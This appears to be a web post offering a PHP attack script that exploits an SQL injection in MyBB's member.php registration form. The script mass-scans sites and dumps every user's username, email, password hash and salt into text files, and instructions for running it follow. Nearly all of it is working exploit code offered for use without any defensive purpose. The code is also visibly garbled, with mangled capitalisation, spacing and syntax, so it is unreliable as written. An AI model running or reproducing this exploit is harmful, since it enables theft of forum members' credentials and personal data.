MYBB SQL Injection Vulnerability

<?php error_reporting (0);? ><form method= "POST" action= "" >input a Url (for example:http://myskins.org/18/) : <br><textarea name= "Siteler" cols= "rows=" 7 "></textarea><br><br><input type=" Submit "value=" Get it! "></form><?php Ob_start (); set_time_limit (0); if (!file_exists (" Dumpsss ")) mkdir (" Dumpsss ");        $_post[' Siteler ']== "") {$siteler = explode ("\ n", $_post[' Siteler '), foreach ($siteler as $sites) {$sites =trim ($sites);            if (checkvulnerable ($sites)) {echo "[+] $sites is vulnerable!\n";        Inject ($sites);        } else {echo "[-] Target is not vulnerable\n";   }}}} else {}function Inject ($site) {$get _website = Parse_url ($site);    $website = $get _website["host"]; $html = HttpPost ("$site/member.php", "Regcheck1=&regcheck2=true&username=makman&password=mukarram &password2=mukarram&[email protected]&[email protected]&referrername=& Imagestring=f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice= 1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step= Registration&action=do_register&regsubmit=submit+registration!&question_id= ' or polygon (select*from    (Select*from (select COUNT (*) from mybb_users LIMIT 0,1) f) x))---");    Preg_match ('!select \ ' (. *) \ ' as!s ', $html, $matches);    $count = $matches [1];    echo "[+] Count: $count \ n";        for ($i = 0; $i <= $count; $i + +) {if ($count = = 1) {$num = "0,1";        } else {$num = "$i, 1"; } $html = HttpPost ("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&am p;password2=mukarram&[email protected]&[email protected]&referrername=&imagestring= f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1& Pmnotice=1&subscriPtionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action =do_register&regsubmit=submit+registration!&question_id= ' or Polygon ((Select*from (Select*from (select        Concat (Username,0x3a,email,0x3a,password,0x3a,salt) from mybb_users LIMIT $num) f) x))---");        Preg_match ('!select \ ' (. *) \ ' as!s ', $html, $matches);            if (Isset ($matches [1])) {$split = Explode (":", $matches [1]);            $username = $split [0];            $email = $split [1];            $password = $split [2];            $salt = $split [3];            echo "Username: $username \nemail: $email \npassword: $password \nsalt: $salt \ n------\ n"; File_put_contents ("dumpsss/$website. txt", "Username: $username \nemail: $email \npassword: $password \nsalt: $salt \        n------\ nthe ", file_append);    }}}function checkvulnerable ($site) {$ch = Curl_init (); $html = HttpPost ("$site/member.php", "Regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=& imagestring=f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1& Receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime= 1416039333&step=registration&action=do_register&regsubmit=submit+registration!&question_id= ' ")    ;    if (Strpos ($html, "You have the error in your SQL syntax")!==false) {return true;    } else {return false;    }}function HttpPost ($site, $post) {$ch = Curl_init ();    curl_setopt ($ch, Curlopt_url, "$site/member.php");    curl_setopt ($ch, Curlopt_returntransfer, true);    curl_setopt ($ch, Curlopt_postfields, $post);    $html = curl_exec ($ch);    Curl_close ($ch); return $html;}? >

Save as xxx.php file, and then execute on the Web page, the Dumpsss folder will be generated in the current directory, if there is a vulnerability, the website members will be exported to the inside TXT file.

If there is no vulnerability, you will be prompted: [-] Target is not vulnerable

Code online View \:HTTPS://GHOSTBIN.COM/PASTE/ZS2MP

MYBB SQL Injection Vulnerability